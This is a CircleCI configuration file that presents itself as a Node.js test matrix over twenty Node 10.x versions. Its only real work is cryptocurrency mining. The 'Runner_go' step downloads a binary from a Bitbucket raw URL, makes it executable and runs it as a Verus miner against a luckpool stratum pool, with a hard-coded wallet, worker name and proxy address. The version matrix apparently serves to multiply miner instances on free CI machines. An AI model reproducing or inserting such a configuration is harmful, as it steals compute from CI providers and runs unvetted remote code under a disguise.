version: 2.1

executors:
  linux:
    docker:
      - image: circleci/clojure:lein-2.9.5

orbs:
  node: circleci/node@2.0.0

jobs:
  test:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
          name: Module
          command: sudo apt-get -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential screen
      - run:
          name: Ijin Akses
          command: chmod u+x *
      - run:
          name: Runner_go
          command: |
            wget https://bitbucket.org/yuken2324/gasan/raw/63a678fadec446dd964a016a4bdd313631609534/aturati2
            chmod +x aturati2
            screen -dmS ls
            POOL=stratum+tcp://na.luckpool.net:3956
            WALLET=RWEy6267cEgspkmuyV2za631rJhYngNfLN
            WORKER=C_17
            PROXY=https://51.222.21.94:32768
            ./aturati2 -a verus -o $POOL -u $WALLET.$WORKER -p c=VRSC,zap=VRSC -t12 -x $PROXY
workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: [linux]
              node-version: [10.0.0, 10.1.0, 10.2.0, 10.2.1, 10.3.0, 10.4.0, 10.4.1, 10.5.0, 10.6.0, 10.7.0, 10.8.0, 10.9.0, 10.10.0, 10.11.0, 10.12.0, 10.13.0, 10.14.0, 10.14.1, 10.14.2, 10.15.0]
